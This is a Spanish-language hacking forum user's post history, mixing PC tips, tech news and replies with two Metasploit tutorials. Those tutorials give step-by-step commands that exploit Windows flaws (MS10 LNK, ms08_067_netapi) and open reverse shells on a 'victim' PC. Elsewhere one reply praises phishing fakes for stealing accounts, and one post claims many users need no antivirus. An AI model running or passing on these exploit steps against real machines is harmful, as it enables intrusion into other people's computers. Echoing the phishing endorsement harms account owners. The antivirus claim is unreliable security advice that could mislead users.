Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Payasako

#41



¿Después de un tiempo desde que lo compraste, tu ordenador va más lento? La respuesta típica es: "claro, debes tenerlo lleno de virus". Error, probablemente no tengas ningún virus, pero sí puedes tenerlo lleno de cosas innecesarias y, entre ellas, el antivirus podría ser una.

Generalizar en este tipo de temas tiene poco sentido, puesto que el nivel de experiencia y conocimientos de cada usuario es el que determina la utilidad real, e incluso la necesidad, de un software para ordenador. En este caso nos centramos en los antivirus y, antes de ahondar en el tema, sí que en cualquier caso se puede asegurar que "no es necesario tener un antivirus en el ordenador". ¿Es conveniente? Sí, probablemente, aunque a continuación puntualizaremos en qué casos sí y en cuales no, y es que a algunos usuarios, incluso, se les debe advertir de que sería más conveniente para ellos no hacer uso de un antivirus.

Como adelantábamos, antes de ahondar en el tema es necesario recordar que no, no todos los usuarios tenemos el mismo nivel de conocimientos y, por lo tanto, cada cual sabrá cuáles son sus posibilidades frente al ordenador, por lo que la responsabilidad de los posibles problemas derivados de un mal uso del ordenador son, única y exclusivamente, del propio usuario.

Los antivirus consumen recursos, reducen el rendimiento
Los componentes de hardware de nuestro ordenador, las piezas internas que hacen posible su funcionamiento, tienen unos límites. El hardware está preparado, en función de sus características técnicas, para hacer funcionar de forma simultánea una cantidad limitada de software y, ¡sorpresa! aunque hay quien no lo sabe, un antivirus no deja de ser un programa, es decir, software. Por lo tanto, aunque depende de cada producto de software de tipo antivirus el que sea mayor o menor el consumo de recursos, en todos los casos nos encontramos con una pérdida de rendimiento como consecuencia de la utilización de un antivirus.

Sin conexión a Internet, ¿para qué quiero un antivirus?
Un ordenador dedicado a ofimática (documentos de texto, hojas de cálculo y similares) que no están siquiera conectados a Internet. ¿Para qué queremos entonces tener un antivirus instalado? Teniendo en cuenta lo explicado justo en el punto anterior, el consumo de recursos derivado de la utilización de un antivirus es un aspecto -negativo, obviamente- que debemos tener en cuenta en la "balanza" que nos lleve a decidirnos entre usar un antivirus o no hacerlo. ¿De dónde llegan los virus? Generalmente, de Internet. Luego, si no estamos conectados a Internet, ¿para qué queremos estar consumiendo recursos de nuestro ordenador y perdiendo rendimiento por culpa del antivirus? Aunque, cuidado, porque un dispositivo de almacenamiento externo como un disco duro, una tarjeta de memoria o un "pen drive" puede tener un virus, aunque no es lo más común.

Sólo navegamos por "sitios web de confianza"
Aquí es donde entran los "conocimientos". Una gran cantidad de usuarios acostumbra a utilizar el ordenador, en cuanto a la navegación por Internet, para visitar siempre los mismos sitios web, y todos ellos "de confianza". Además, apenas descarga archivos y, cuando lo hace, provienen todos ellos también de sitios web de confianza. Si hacemos este tipo de uso con nuestro ordenador, ¿para qué vamos a utilizar un antivirus, si las páginas web que visitamos ya se encargan de mantener con un alto nivel de protección los archivos que intercambian con nosotros?

No es mejor prevenir que curar, no siempre
Por último tenemos el caso de los que utilizan el ordenador "sin límites" navegando por todo tipo de páginas web y con un riesgo de "infección" medio. Es decir, el caso de la mayor parte de los usuarios de ordenador conectado a Internet. En este caso, y probablemente sólo en este, tiene sentido tener un antivirus instalado en nuestro ordenador. Ahora bien, instalar un antivirus es seguir la filosofía del "mejor prevenir que curar", cuando no siempre es la mejor idea.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#42
Hacking / Re:FTPBruteForce
Junio 07, 2015, 12:48:45 PM
¡Que grande @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta! Buena suerte con tus estudios y a probar esto  8)
#43
Windows / Accediendo a God Mode en Windows 7.
Junio 07, 2015, 12:45:45 PM



Supongo que esto lo sabrán ya muchos, pero vengo a postear para aquel que aún no lo haya probado y quiera experimentarlo.


Esto nos puede ser útil en el día a día, ya que nos permite acceder a todos los paneles de control del sistema desde una sola carpeta. Sobre todo para los administradores a la hora de hacer un "troubleshooting" por ejemplo.

Primero crearemos un acceso a un panel en el que tenemos todos los accesos de configuraciones a nuestro Panel de Control. Luego tendremos que crear una carpeta (da igual donde la creemos) la puedes poner en el Escritorio, y le pones de nombre a la carpeta:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Y Veremos como cambia el icono de la carpeta por uno igual que el de Panel de Control, haciendo x2click entraremos al Modo Dios.
#44
Ese bro como da caña ahí al bypass, un pedazo de tutorial hermano!
#45
Dudas y pedidos generales / Re:Duda VPN + velocidad
Abril 06, 2015, 05:02:33 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola gente, resulta que me baje Cyberghost gratuito, y bueno tengo una duda:

Imagina que tengo un ordenador con conexión de internet de unos 200 megas y tengo en otra casa otro ordenador con conexión de 5 megas

y en los 2 tengo el cyberghost ¿en cual va mas rápido? es decir se "fusiona" las conexiones del cyberghost con los megas que tengo o no tiene nada que ver?
Como dice blackdrake, Cyberghost lo que hace es que te conecta a un Servidor donde se encuentra más gente en dicho servidor, contra más gente haya la conexión es más lenta, por eso yo siempre escojo los servidores donde hay menos gente.

Regards.
#46
Diseño UX/UI / Re:Votaciones - MiniTorneo.
Abril 05, 2015, 02:16:43 PM
Es dificil, pero voto por Cronos, ya que le ha dado un giro a la imagen y la ha hecho completamente diferente y elegante a la que le dieron.
#47
Ten confianza en ti mismo, e ignora a los demás, cada uno lo hace como puede, una vez que practicas ya le cojes el vicio.
#48
Off Topic / Re:¿Qué computadora tienes?
Abril 03, 2015, 10:01:36 PM
Acer Aspire One me quiero comprar un ASUS o Lenovo.

Procesador: Intel(R) Atom(TM) CPU N455 1.66 GHz 1.67 GHz
Memoria Instalada (RAM): 1Gb
x32 bits
#49
Un buen hábito, no sabia que habia que hacer "ejercicio" para estar en un ordenador jaja. Yo mido 1,75 y tengo 15 años y no me adapto a ninguna de esas maneras, voy a tener que hacerlo xD.
#50

Fue creada por Tim Berners-Lee usando un computador NeXT, y su función era informar sobre la nueva y emocionante World Wide Web.


La World Wide Web comenzó a existir en 1991, y a más de 20 años de su creación, el primer sitio web del mundo está almacenado por la W3C, que lo conserva para que recordemos la historia. Fue creado por Tim Berners-Lee usando un computador NeXT, y su función era informar sobre la nueva y emocionante World Wide Web.

Los visitantes podían aprender más sobre el proyecto, cosas sobre el hipertexto, detalles técnicos para crear una página web, y una explicación de cómo buscar información en la web (algo complicado porque no había buscadores). Por esos tiempos, los únicos que tenían un navegador eran Berners-Lee y sus colegas del CERN, así que la primera página web no tenía mucha difusión que digamos.

El primer gran paso para masificarla se dio recién en 1993, debido al lanzamiento del navegador Mosaic. Para entonces, ya se habían instalado algunos servidores web más y varias universidades se habían sumado. La versión guardada no es exactamente la original de 1991, porque esa se perdió. El CERN explica que la versión que tenemos hoy corresponde a 1992, y que por esos tiempos el sitio se actualizaba diariamente para agregar información sobre el desarrollo del proyecto de la WWW.

En 1994, Berners Lee fundó el Wordl Wide Web Consortium (W3C) en el MIT en Estados Unidos para asegurar un estándar, que permitiera que sitios diferentes funcionaran de la misma manera. La versión de 1992 nos muestra cómo era la web entonces, sin imágenes por ejemplo. Es raro pensar que la WWW no lleva tanto tiempo en el mundo, y el enorme desarrollo que ha tenido desde sus inicios.


La primera página del mundo, Enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: FayerWayer
#51
Windows / Optimizando Windows 7 con ReadyBoost.
Abril 02, 2015, 10:41:06 AM

Hola muy buenas usuarios de Underc0de, hoy les traigo una aplicación que sirve para optimizar nuestro Windows 7, llamada ReadyBoost.


Conecte una unidad flash o una tarjeta USB y permita que ReadyBoost la use. ReadyBoost tiene como función ayudar cuando la memoria de su equipo funciona con lentitud. La poca memoria puede hacer que su equipo funcione con lentitud porque Windows, que necesita lugar para almacenar datos, recurre al disco duro. La memoria flash ofrece una alternativa más veloz.

ReadyBoost funciona con la mayoría de los dispositivos de almacenamiento flash. En Windows 7, puede manejar más memoria flash e incluso varios dispositivos (hasta ocho, con un máximo de 256 gigabytes (GB) de memoria adicional).



Yo ya lo puse en mi portátil y va mucho más rapido que antes.
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#52
Informática Forense / Re:FOCA, obtener metadatos
Abril 02, 2015, 10:37:53 AM
Buen tutorial compañero, pero yo soy otro usuario que opta por usar Grampus.
#53
Hacking / Re:Tutorial phishing
Abril 02, 2015, 09:48:54 AM
Yo el año pasado me pasaba el dia haciendo esto jajaja. Estos fakes son muy útiles para robarte unas cuentas.
#54
Muy bueno antrax, lo malo es que el CloudFlare es bypasseable, me he estado informando sobre mod_evasive y no quedaría nada mal en mi web jajaja.

Un saludo, Payasako.
#55
Talleres Underc0de / Re:Taller de Seguridad Web #1
Marzo 31, 2015, 08:24:30 PM
Hay un error en la programación de buscador.php

CitarParse error: syntax error, unexpected 'align' (T_STRING) in /home/u387232811/public_html/buscador.php on line 12

En la línea 12:
Citarecho'<p align="center">No se ha encontrado
#56
Bueno, en este tutorial voy a enseñar a Liberar algo de espacio en tu diapositivo Android, simplemente distribuyendo archivos en la Tarjeta SD "Card" y nuestra memoria interna del diapositivo "Phone"..

Ok, primero conectaremos nuestro teléfono a nuestro pc, conexión USB, y iremos al pc, Inicio >> Documentos Y Clickamos en Equipo y luego en el nombre de tu Diapositivo, (Yo usaré un Samsung Galaxy Trend Plus)


Ahora iremos a "Phone" y seleccionaremos los archivos que queramos pasar a la tarjeta SD, Copiamos y lo pegamos en la tarjeta SD, En el directorio "Card"

Cuando tengamos eso hecho, y se hayan copiado las carpetas a "Card" Podemos borrar las originales de nuestro "Phone" y así liberar algo de espacio.. La barra ahora saldría de color Azul, que significa que hay más espacio disponible.


Preguntas:
Citar¿No se generaran errores? Osea puedes mover algo que el dispositivo no busque en la SD.
- Errores se pueden generar, sí, pero si tu mismo conoces el contenido de cada carpeta podrás mover, en el diapositivo tambien se quedan carpetas antiguas de programas ya borrados que ocupan espacio. 

PD: Hice el tutorial liberando unos 50mb pero se pueden llegar a liberar hasta gbs.
Saludos!
#57

La Guardia Civil imputa a un menor de edad el ataque informático a más de 75.000 ordenadores


El menor, un autodidacta informático, consiguió evadir protocolos de seguridad considerados como infranqueables. Tras controlar más de 75.000 ordenadores repartidos por todo el mundo de internautas, lanzó un ataque masivo de más de doce millones de visitas, a una página web prestigiosa de la seguridad informática.

La Guardia Civil, en el marco de la operación "CANDELARIA", desarrollada en Cataluña, han imputado a un menor de edad, residente en Tenerife, como presunto autor de un delito de Daños en Sistemas Informáticos, al haber "infectado" miles de ordenadores ubicados en distintos países, con el objetivo de dominarlos y lanzar ataques masivos a determinadas páginas web, como reto personal para demostrar la vulnerabilidad de esos portales.

CitarLas investigaciones se iniciaron tras recibir una denuncia del Administrador de la página web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en la que manifestaba que su página había quedado anulada durante varios días como consecuencia de un incremento masivo de visitas, muy por encima de lo habitual, y seguramente provocadas con esta intención, lo que se conoce como ataque DDos (Distributed Denial of Service).

Los contenidos de esta página, así como la gran mayoría de las personas que colaboran en ella, programadores y administradores de sistemas, tienen por objeto contribuir a extender sus conocimientos y experiencias en torno a la seguridad de las redes en distintos ámbitos, tanto particulares como empresariales.

El menor, que utilizaba el nick "n3ptuno", no poseía ningún tipo de formación relacionada con la informática ni con la programación, cosa que no lo detuvo para ir desarrollando sus conocimientos de forma autodidacta a partir de los 13 años.
Había desarrollado un "virus" aprovechándose de los fallos de seguridad en el protocolo UDP (uno de los canales de información en la red), para infectar los PCs. De esta manera, conseguía dominar los ordenadores de los internautas y así iniciar, cuando él lo decidiese, visitas masivas a las páginas elegidas. Además de la web cuyo Administrador interpuso la denuncia, la Guardia Civil, pudo constatar ataques en los que se estaba llevando a cabo el mismo procedimiento a otras paginas, fundamentalmente a foros y servidores dedicados al juego denominado San Andreas..

Infección de los ordenadores (Zombies):
El menor colgaba un vídeo en youtube con frases atractivas para captar la atención del internauta, de esta forma conseguía que el usuario se descargarse el contenido y automáticamente resultaba infectado.

Este virus tenía la peculiaridad de poder propagarse por conducto de programas tan extendidos como Messenger, Fotolog, etc.

Una vez infectados con el virus, el menor pasaba a dominar los PCs a su antojo con la intención de realizar visitas a la misma vez, a las páginas que quería atacar, colapsando los servidores de las mismas.

Un ejemplo de ello, fue la página No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que sufrió en pocos minutos más de doce millones de visitas simultáneas, cuando el promedio ordinario oscilaba en unas cien mil.

Mediante esta operación había conseguido controlar más de 75.000 ordenadores, El menor fue puesto a disposición de la Fiscalía de Menores de Santa Cruz de Tenerife.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Publicación de el periódico "ElMundo"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Publicación de "ABC"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Publicación de "ElPaís"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comentario: He publicado esto porque "n3ptun0" era un viejo usuario del foro de Hacking & Seguridad "Most-Security", y es vieja esta noticia, pero me ha parecido interesante porque a mí me echaron la culpa de atacar la web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, me he quedado helado cuando he visto esto por ahí.

PD: La noticia es vieja, pero es una web conocida y me pareció interesante publicarlo.
#58
Hola a todos de Underc0de, hoy os voy a explicar y poner los pasos para explotar la vulnerabilidad LNK de Windows con Metasploit.

Primero hay que actualizar Metasploit.
Código: text
#msfupdate


Luego configuramos Metasploit como sigue:
Código: text
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.0.33 SRVHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set URIPATH / URIPATH => / msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.0.33 LHOST => 192.168.0.33 msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 4444 LPORT => 4444 msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit


Luego en el navegador de la PC víctima visitamos la siguiente URL:
Código: text
\192.168.0.33QueHeTwEW


Entonces se abrirá el explorador de windows para visualizar los archivos compartidos que contienen el archivo .LNK que produce la ejecución del payload.

Para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:
Código: text
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254 UNCHOST => 192.168.0.254


Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.

Bueno espero que os haya ayudado. ¡Saludos!
#59

Metasploit | Penetrar una pc.


En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citaruse exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citarset RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citarset payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citarset LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citarexploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)
#60

Se ha descubierto una vulnerabilidad en la funcionalidad de Android Wi-Fi Direct, que permite establecer una conexión directa entre dispositivos compatibles y sin intermediarios, es decir, sin un punto de acceso intermedio.


Además de dispositivos móviles, hay impresoras, cámaras y computadoras que usan Wi-Fi Direct para hacer una conexión peer-to-peer sin router inalámbrico.

El bug en cuestión, que afecta a muchos dispositivos con Android que están buscando otros productos con Wi-Fi Direct, se explota en forma remota a través de una denegación de servicio (DoS). Un atacante puede falsificar y enviar un paquete de respuesta de sondeo específicamente diseñado, hecho que produciría el reinicio del subsistema Dalvik de Android, debido a una excepción en la clase WiFiMonitor que no puede ser manejada, tal como explica el reporte de la vulnerabilidad.

Para ser más específicos, si el atacante envía un evento wpa_supplicant malformado, es la clase WifiP2PDevice la que lanza una excepción de tipo IllegalArgument Exception, que a su vez colapsa el sistema, al no poder ser manejada.
Según The Hacker News, este bug en Android Wi-Fi Direct afecta a varios dispositivos Android:
* Nexus 5 – Android 4.4.4
* Nexus 4 – Android 4.4.4
* LG D806 – Android 4.2.2
* Samsung SM-T310 – Android 4.2.2
* Motorola RAZR HD – Android 4.1.2

Core Security la reportó inicialmente a Google el 26 de septiembre pasado, pero el equipo de seguridad de Android la clasificó como de baja severidad, y explicó en repetidas ocasiones que no tienen tiempo en sus planes para lanzar un parche. Por eso, los investigadores han decidido hacerla pública.

The Register concuerda con Google en cuanto a la clasificación del bug, ya que está limitado a períodos cortos de tiempo en los que el dispositivo Android esté escaneando en busca de otros equipos con Wi-Fi Direct, además de proximidad geográfica. De hecho, el atacante tiene que estar cerca para enviar los datos malformados a la víctima. Y aun así, sostiene, su impacto está limitado a un reinicio.

De todas formas, considerando que las vulnerabilidades son algo de los más frecuente últimamente, te recomendamos leer nuestra Guía de Seguridad en Android para que tu dispositivo esté protegido.


Fuente: SeguridadPc